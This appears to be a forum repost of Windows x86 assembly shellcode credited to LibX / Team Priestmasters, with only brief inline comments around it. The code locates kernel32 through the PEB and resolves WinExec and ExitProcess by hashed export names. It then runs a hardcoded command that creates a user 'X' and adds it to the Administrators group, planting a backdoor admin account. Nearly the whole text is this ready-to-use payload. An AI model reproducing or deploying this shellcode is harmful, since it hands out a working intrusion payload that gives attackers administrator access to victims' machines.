文章作者:LibX / Team Priestmasters (
www.priestmaster.org)
复制内容到剪贴板
代码:
; Generic Command Execution Shellcode v2.0
; Coded by LibX / Team Priestmasters ([url]www.priestmaster.org[/url])
[BITS 32]
call Start
CMD: db "cmd.exe /c net user X X /add && net localgroup Administrators /add X", 0
WinExec equ 0x0e8afe98
ExitProcess equ 0x73e2d87e
Start:
pop ebx
mov ebp, esp
sub esp, 64
mov eax, esp
xor al, al
mov esp, eax ; align the stack pointer
; Get kernel base address function
; --------------------
mov eax, [fs:30h] ; store the address of the PEB in eax
mov eax, [eax+0ch] ; extract the pointer to the loader data structure
mov esi, [eax+1ch] ; extract the first entry in the initialization order module list
lodsd ; grab the next entry in the list which points to kernel32.dll
mov edx, [eax+08h] ; grab the module base address and store it in eax
mov dword [ebp-4], edx ; store the pointer at ebp-4
; --------------------
; WinExec function
; --------------------
push eax ; save eax value
push esi ; save esi value
push dword WinExec ; push WinExec hash
push dword [ebp-4] ; push kernel base address
call GetProcAddress ; get the function address
xor esi, esi ; zero esi
inc esi ; set esi value to 1
push esi ; push esi value (CmdShow)
push ebx ; push the command to execute (CMD)
call eax ; call WinExec
pop esi ; restore esi value
pop eax ; restore eax value
; --------------------
call Exit ; call function to exit the process
Exit:
; ExitProcess function (no need to save register values :P)
; --------------------
push dword ExitProcess ; push ExitProcess hash
push dword [ebp-4] ; push kernel base address
call GetProcAddress ; get the function address
xor esi, esi ; zero esi
push esi ; push esi value (ExitCode)
call eax ; call ExitProcess
; --------------------
GetProcAddress:
pushad ; Save all registers
mov ebp, [esp+24h] ; Store the base address in eax
mov eax, [ebp+3ch] ; PE header VMA
mov edx, [ebp+eax+78h] ; Export table relative offset
add edx, ebp ; Export table VMA
mov ecx, [edx+18h] ; Number of names
mov ebx, [edx+20h] ; Names table relative offset
add ebx, ebp ; Names table VMA
FindFunction:
jecxz Finished ; Jump to the end if ecx is 0
dec ecx ; Decrement our names counter
mov esi, [ebx+ecx*4] ; Store the relative offset of the name
add esi, ebp ; Set esi to the VMA of the current name
ComputeHash:
xor edi, edi ; Zero edi
xor eax, eax ; Zero eax
cld ; Clear direction
ComputeHashAgain:
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz ComputeHashDone ; If the ZF is set, we've hit the null term.
ror edi, 0dh ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp ComputeHashAgain ; Next iteration
ComputeHashDone:
Compare:
cmp edi, [esp+28h] ; Compare the computed hash with the requested hash
jnz FindFunction ; No match, try the next one.
mov ebx, [edx+24h] ; Ordinals table relative offset
add ebx, ebp ; Ordinals table VMA
mov cx, [ebx+2*ecx] ; Extrapolate the function's ordinal
mov ebx, [edx+1ch] ; Address table relative offset
add ebx, ebp ; Address table VMA
mov eax, [ebx+4*ecx] ; Extract the relative function offset from its ordinal
add eax, ebp ; Function VMA
mov [esp+1ch], eax ; Overwrite stack version of eax from pushad
Finished:
popad ; Restore all registers
ret
